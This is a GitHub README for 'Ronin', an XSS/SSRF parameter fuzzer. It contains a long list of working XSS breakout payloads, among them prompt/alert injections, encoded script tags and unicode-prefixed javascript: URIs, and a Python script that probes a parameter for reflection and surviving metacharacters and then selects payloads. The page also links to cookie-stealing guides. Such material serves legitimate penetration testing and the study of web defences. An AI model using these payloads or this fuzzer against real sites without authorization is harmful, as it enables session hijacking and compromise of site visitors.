https://github.com/byt3n33dl3/ronin

🔱 Ronin the Shogun, WebApp parameter analysis and fuzzer for XSS and SSRF.
crlf cross-site-request-forgery cross-site-scripting injection-attacks ronin ssrf xss

Last synced: 8 months ago
README

[![Downloads](https://img.shields.io/badge/Download-Windows%20Build-blue.svg)](https://github.com/pxcs/Ronin/releases)
[![License](https://img.shields.io/badge/License-Artistic%20v2%2B-blue.svg)](https://github.com/pxcs/Ronin/assets/LICENSE)
# Ronin the shogun

# Installation

```shell
git clone https://github.com/pxcs/Ronin.git
cd Ronin        # the clone directory matches the repository name (case matters on Linux)
python2 ronin.py
```
[Ronin](https://github.com/pxcs/Ronin/) is provided for educational and research purposes only. The authors of this project are in no way responsible for any misuse of **ronin**.

- [What is XSS](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))
- [Steal cookie with XSS Attack](https://security.stackexchange.com/questions/49185/xss-cookie-stealing-without-redirecting-to-another-page)
- [How to use XSS](https://canyoupwn.me/tr-how-to-use-xss/)

## The automatic XSS injection attack
ronin helps you carry out Cross-Site Scripting (XSS) attacks. XSS is a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. An XSS attack occurs when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Before any payload is sent, the parameter analysis has to answer two questions: which parameters are reflected into the response at all, and which metacharacters (`<`, `>`, `"`, `'`, and so on) come back unencoded, because that decides which payload can break out of the context it lands in.

Manual XSS payloads

Payloads made of HTML tags were stripped when this page was rendered; only the tag-free entries remain:

```plaintext
'"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window ")-'
"-eval("window ")-"
"onclick=prompt(8)>"@x.y
javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)
-->
`"'>
a='hello\x27;javascript:alert(1)//';
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
```
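The parameter analysis described in the XSS section and the manual payload list above fit together as follows. The script below is an added example, not ronin's own code: it checks whether a parameter is reflected, which metacharacters survive encoding, in what HTML context each reflection lands, and which of the manual payloads are therefore worth sending. `vulnerable_page` and `escaped_page` are constructed stand-ins for a target so the script runs offline; against a real site (one you are authorized to test) you would pass an HTTP fetch callback instead. `METACHARS`, `PAYLOADS`, `contexts_of` and `analyse` are names chosen for this example.

```python
# Added example (not ronin's code): reflection, metacharacter and context
# analysis, the step a parameter fuzzer performs before firing XSS payloads.
# vulnerable_page and escaped_page are constructed stand-ins for a target so
# the script runs offline; swap in a real fetch callback for a site you are
# authorized to test.
import html
import secrets
from typing import Callable, Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, quote


def vulnerable_page(query: str) -> str:
    """Constructed target: reflects ?q= unencoded into a text node and an attribute."""
    q = parse_qs(query).get("q", [""])[0]
    return f'<html><body><p>Results for {q}</p><input value="{q}"></body></html>'


def escaped_page(query: str) -> str:
    """Constructed target: the same page with HTML-entity encoding of the value."""
    q = html.escape(parse_qs(query).get("q", [""])[0], quote=True)
    return f'<html><body><p>Results for {q}</p><input value="{q}"></body></html>'


# Characters whose unencoded reflection decides which payloads can work.
METACHARS = ['<', '>', '"', "'", '`', '/', '(', ')', ';']

# Entries from the manual list above, each with the characters it needs to
# survive unencoded in order to break out of the context it targets.
PAYLOADS: List[Tuple[str, Set[str]]] = [
    ('"onclick=prompt(8)>"@x.y', {'"', '>', '(', ')'}),      # double-quoted attribute
    ("'-prompt(8)-'", {"'", '(', ')'}),                      # single-quoted JS string
    ('";a=prompt,a()//', {'"', ';', '(', ')', '/'}),         # double-quoted JS string
    ('\'"-prompt(8)-"', {"'", '"', '(', ')'}),               # either quote style
]


def contexts_of(body: str, canary: str) -> List[str]:
    """Classify every reflection point as text node, tag, quoted attribute or script."""
    found: List[str] = []
    start = 0
    while (idx := body.find(canary, start)) != -1:
        before = body[:idx]
        lowered = before.lower()
        if before.rfind('<') > before.rfind('>'):       # still inside an open tag
            tag = before[before.rfind('<'):]
            if tag.count('"') % 2:
                found.append('attr_dq')
            elif tag.count("'") % 2:
                found.append('attr_sq')
            else:
                found.append('tag')
        elif lowered.rfind('<script') > lowered.rfind('</script'):
            found.append('script')
        else:
            found.append('html')
        start = idx + len(canary)
    return found


def analyse(fetch: Callable[[str], str], param: str) -> Optional[Dict[str, list]]:
    """Probe one parameter: reflection, surviving metacharacters, usable payloads."""
    canary = secrets.token_hex(4)            # random, so it cannot already be in the page
    body = fetch(f"{param}={canary}")
    if canary not in body:
        return None                          # not reflected: nothing to fuzz here
    survivors = []
    for ch in METACHARS:
        marker = f"{canary}{ch}{canary}"     # wrapped so a partial reflection does not match
        if marker in fetch(f"{param}={quote(marker, safe='')}"):
            survivors.append(ch)
    usable = [p for p, needed in PAYLOADS if needed <= set(survivors)]
    return {"contexts": contexts_of(body, canary), "survivors": survivors, "payloads": usable}


if __name__ == "__main__":
    for name, page in (("vulnerable_page", vulnerable_page), ("escaped_page", escaped_page)):
        print(name, analyse(page, "q"))
```

Against `vulnerable_page` every metacharacter comes back intact and all four payloads qualify; against `escaped_page` only the characters `html.escape` leaves alone survive (backtick, slash, parentheses, semicolon), so none of the quote-based payloads can close their context and the fuzzer should move on rather than spray the whole list. The canary is random per run so a static page that happens to contain the probe text cannot produce a false positive.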

# Thanks to:
- MaXe
- payloadbox